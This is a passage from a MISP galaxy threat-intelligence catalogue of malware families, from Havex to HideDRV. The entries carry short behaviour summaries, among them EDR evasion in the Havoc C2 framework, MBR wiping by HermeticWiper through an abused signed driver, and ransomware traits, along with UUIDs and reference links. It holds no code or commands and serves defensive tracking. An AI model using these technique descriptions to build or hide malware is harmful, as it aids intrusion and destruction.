Once installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.
Havex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.
Internal MISP references
UUID c04fc02e-f35a-44b6-a9b0-732bf2fc551a
which can be used as unique global reference for Havex RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-083a - webarchive
- https://www.f-secure.com/weblog/archives/00002718.html - webarchive
- https://vblocalhost.com/uploads/VB2021-Slowik.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-liberty - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Havoc
First released in October 2022, the Havoc C2 Framework is a flexible post-exploitation framework written in Golang, C++, and Qt, with agents called 'Demons' written in C and ASM, created by @C5pider. Designed to support red team engagements and adversary emulation, it offers a robust set of capabilities tailored for offensive security operations. The framework, which is under active development, utilizes HTTP(s) and SMB as communication protocols for its implants. Havoc can generate implants, known as Demons, in several formats including EXE, DLL, and Shellcode. A notable feature of Havoc is its ability to bypass EDR by employing advanced evasion techniques such as sleep obfuscation, return address stack spoofing, and indirect syscalls. This capability enhances its effectiveness in evading detection and circumventing security measures.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Havoc.
Known Synonyms |
---|
Havokiz |
Internal MISP references
UUID ddbcedee-ac3e-45d3-be2c-d7315d83e6a6
which can be used as unique global reference for Havoc
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/ - webarchive
- https://www.youtube.com/watch?v=ErPKP4Ms28s - webarchive
- https://4pfsec.com/havoc-c2-first-look/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.immersivelabs.com/blog/havoc-c2-framework-a-defensive-operators-guide/ - webarchive
- https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks - webarchive
- https://twitter.com/embee_research/status/1579668721777643520?s=20&t=nDJOv1Yf5mQZKCou7qMrhQ - webarchive
- https://github.com/HavocFramework/Havoc - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HAWKBALL
HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.
Internal MISP references
UUID dc07507b-959f-4521-be0f-b9ff2b32b909
which can be used as unique global reference for HAWKBALL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HawkEye Keylogger
HawkEye is a keylogger that has been distributed since 2013. Discovered by IBM X-Force, it is currently spread via phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications, but in the most recently observed versions new "loader capabilities" have been spotted. It is sold by its development team on dark web markets and hacking forums.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HawkEye Keylogger.
Known Synonyms |
---|
HawkEye |
HawkEye Reborn |
Predator Pain |
Internal MISP references
UUID 31615066-dbff-4134-b467-d97a337b408b
which can be used as unique global reference for HawkEye Keylogger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger - webarchive
- https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/ - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/ - webarchive
- http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html - webarchive
- https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/ - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/ - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-galleon - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-galleon - webarchive
- https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html - webarchive
- https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/ - webarchive
- https://www.cyberbit.com/hawkeye-malware-keylogging-technique/ - webarchive
- https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter - webarchive
- https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/ - webarchive
- https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HazyLoad
Internal MISP references
UUID a0d0d428-fd1b-460c-a03a-0003c6daff6d
which can be used as unique global reference for HazyLoad
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hazy_load - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ - webarchive
- https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HDMR
HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: "!!! READ THIS !!!.hta".
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HDMR.
Known Synonyms |
---|
GO-SPORT |
Internal MISP references
UUID d643273f-7a53-4703-bf65-95716d55a5dd
which can be used as unique global reference for HDMR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HDRoot
Internal MISP references
UUID af8df5d7-cd8c-41ea-b9ec-b69ab7811e2d
which can be used as unique global reference for HDRoot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HeaderTip
The Chinese threat actor "Scarab" is using a custom backdoor dubbed "HeaderTip" according to SentinelLABS. This malware may be the successor of "Scieron".
Internal MISP references
UUID 994c64f3-ca59-4392-9ab4-0256e79fcfad
which can be used as unique global reference for HeaderTip
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip - webarchive
- https://cert.gov.ua/article/38097 - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip - webarchive
- https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/ - webarchive
- https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Headlace
Internal MISP references
UUID 7229ccd9-1f2b-4a71-8119-1f4eb1c04a5d
which can be used as unique global reference for Headlace
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Helauto
Internal MISP references
UUID 9af26655-cfba-4e02-bd10-ad1a494e0b5f
which can be used as unique global reference for Helauto
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HelloBot (Windows)
Internal MISP references
UUID 64cecfd4-96fd-42a3-8537-fc0e041271a2
which can be used as unique global reference for HelloBot (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HelloKitty (Windows)
Unit42 states that HelloKitty is a ransomware family that first surfaced at the end of 2020, primarily targeting Windows systems. The malware family got its name due to its use of a Mutex with the same name: HelloKittyMutex. The ransomware samples seem to evolve quickly and frequently, with different versions making use of the .crypted or .kitty file extensions for encrypted files. Some newer samples make use of a Golang packer that ensures the final ransomware code is only loaded in memory, most likely to evade detection by security solutions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HelloKitty (Windows).
Known Synonyms |
---|
KittyCrypt |
Internal MISP references
UUID 433c97b5-89ac-4783-a312-8bb890590ff0
which can be used as unique global reference for HelloKitty (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty - webarchive
- https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html - webarchive
- https://unit42.paloaltonetworks.com/emerging-ransomware-groups/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/ - webarchive
- https://www.speartip.com/resources/fbi-hellokitty-ransomware-adds-ddos-to-extortion-arsenal/ - webarchive
- https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/ - webarchive
- https://www.ic3.gov/Media/News/2021/211029.pdf - webarchive
- https://twitter.com/fwosar/status/1359167108727332868 - webarchive
- https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/ - webarchive
- https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html - webarchive
- https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks - webarchive
- https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/ - webarchive
- https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group - webarchive
- https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html - webarchive
- https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html - webarchive
- https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7 - webarchive
- https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-249a - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape - webarchive
- https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/ - webarchive
- https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Helminth
Internal MISP references
UUID 19d89300-ff97-4281-ac42-76542e744092
which can be used as unique global reference for Helminth
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth - webarchive
- https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html - webarchive
- http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/ - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ - webarchive
- https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Heloag
Internal MISP references
UUID bb07e153-2e51-4ce1-97a3-4ec8a936e625
which can be used as unique global reference for Heloag
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HemiGate
Internal MISP references
UUID 3db00976-d81d-4a54-a639-ae087bc2493d
which can be used as unique global reference for HemiGate
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Herbst
Internal MISP references
UUID ca8482d9-657b-49fe-8345-6ed962a9735a
which can be used as unique global reference for Herbst
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Heriplor
Internal MISP references
UUID 9d4fc43c-28a1-45ea-ac2c-8d53bdce118b
which can be used as unique global reference for Heriplor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor - webarchive
- https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group - webarchive
- https://vblocalhost.com/uploads/VB2021-Slowik.pdf - webarchive
- https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hermes
Internal MISP references
UUID 30a230c1-b598-4d06-90ab-3254d6a626d8
which can be used as unique global reference for Hermes
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes - webarchive
- https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html - webarchive
- https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12 - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside - webarchive
- https://www.youtube.com/watch?v=9nuo-AGg4p4 - webarchive
- https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://www.malwarebytes.com/blog/news/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HermeticWiper
According to SentinelLabs, HermeticWiper is a custom-written application with very few standard functions. It abuses a signed driver called "empntdrv.sys", associated with the legitimate software "EaseUS Partition Master", to enumerate the MBR and all partitions of every physical drive connected to the victim's Windows device, and overwrites the first 512 bytes of every MBR and partition it can find, rendering them unusable. This malware is associated with the attacks against Ukraine during the Russian invasion in February 2022.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HermeticWiper.
Known Synonyms |
---|
DriveSlayer |
FoxBlade |
KillDisk.NCV |
NEARMISS |
Internal MISP references
UUID db6c1ec5-3961-47ce-9cd1-e650388a15fd
which can be used as unique global reference for HermeticWiper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper - webarchive
- https://twitter.com/fr0gger_/status/1497121876870832128 - webarchive
- https://www.brighttalk.com/webcast/15591/534324 - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-057a - webarchive
- https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/ - webarchive
- https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/ - webarchive
- https://dgc.org/en/hermeticwiper-malware/ - webarchive
- https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/ - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia - webarchive
- https://twitter.com/threatintel/status/1496578746014437376 - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
- https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ - webarchive
- https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/ - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/ - webarchive
- https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/ - webarchive
- https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/ - webarchive
- https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/ - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/ - webarchive
- https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/ - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html - webarchive
- https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/ - webarchive
- https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/ - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket - webarchive
- https://community.riskiq.com/article/9f59cb85 - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html - webarchive
- https://brandefense.io/hermeticwiper-technical-analysis-report/ - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf - webarchive
- https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/ - webarchive
- https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine - webarchive
- https://thehackernews.com/2022/02/putin-warns-russian-critical.html - webarchive
- https://www.englert.one/hermetic-wiper-reverse-code-engineering - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html - webarchive
- https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/ - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works - webarchive
- https://twitter.com/Sebdraven/status/1496878431719473155 - webarchive
- https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf - webarchive
- https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks - webarchive
- https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/ - webarchive
- https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/ - webarchive
- https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation - webarchive
- https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/ - webarchive
- https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations - webarchive
- https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html - webarchive
- https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/ - webarchive
- https://eln0ty.github.io/malware%20analysis/HermeticWiper/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.mandiant.com/resources/information-operations-surrounding-ukraine - webarchive
- https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper - webarchive
- https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/ - webarchive
- https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/ - webarchive
- https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/ - webarchive
- https://www.youtube.com/watch?v=sUlW45c9izU - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HermeticWizard
Internal MISP references
UUID f4400c49-75c6-494a-aa3e-d873404281c1
which can be used as unique global reference for HermeticWizard
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard - webarchive
- https://www.brighttalk.com/webcast/15591/534324 - webarchive
- https://twitter.com/ET_Labs/status/1502494650640351236 - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ - webarchive
- https://twitter.com/silascutler/status/1501668345640366091 - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HerpesBot
Internal MISP references
UUID 4734c5a4-e63b-4bb4-8c01-ab0c638a6c21
which can be used as unique global reference for HerpesBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HesperBot
Internal MISP references
UUID 2637315d-d31e-4b64-aa4b-2fc265b0a1a3
which can be used as unique global reference for HesperBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
heyoka
Internal MISP references
UUID 5833d95c-4131-4cd3-8600-fc40bb834fe3
which can be used as unique global reference for heyoka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HiAsm
Internal MISP references
UUID c49e1f43-a16a-49b1-b23e-9e49cd20c90b
which can be used as unique global reference for HiAsm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hidden Bee
Internal MISP references
UUID f1e4862e-75a3-4843-add3-726a6535019c
which can be used as unique global reference for Hidden Bee
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee - webarchive
- https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/ - webarchive
- https://www.freebuf.com/column/175106.html - webarchive
- https://www.msreverseengineering.com/blog/2018/9/2/weekend-project-a-custom-ida-loader-module-for-the-hidden-bee-malware-family - webarchive
- https://www.freebuf.com/column/174581.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HiddenTear
HiddenTear is an open source ransomware developed by a Turkish programmer and later released as a proof of concept on GitHub. The malware generates a local symmetric key in order to encrypt a configurable folder (/test was the default one) and sends that key to a centralized C&C server. Due to its small payload it was used as a real attack vector in email phishing campaigns. Variants are still used in attacks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HiddenTear.
Known Synonyms |
---|
Cryptear |
FuckUnicorn |
Internal MISP references
UUID b96be762-56a0-4407-be04-fcba76c1ff29
which can be used as unique global reference for HiddenTear
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear - webarchive
- https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/ - webarchive
- https://twitter.com/struppigel/status/950787783353884672 - webarchive
- https://www.linkedin.com/posts/threatmon_azzasec-ransomware-technical-malware-analysis-ugcPost-7223910683967393792-eZaa?utm_source=share&utm_medium=member_desktop - webarchive
- https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/ - webarchive
- https://utkusen.com/blog/im-sorry-for-hidden-tear-eda2 - webarchive
- https://github.com/goliate/hidden-tear - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/ - webarchive
- https://www.bleepingcomputer.com/news/security/hidden-tear-ransomware-developer-blackmailed-by-malware-developers-using-his-code/ - webarchive
- https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html - webarchive
- https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring - webarchive
- https://twitter.com/JAMESWT_MHT/status/1264828072001495041 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HideDRV
Internal MISP references
UUID 84b30881-00bc-4206-8170-51705a8e26b1
which can be used as unique global reference for HideDRV
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv - webarchive
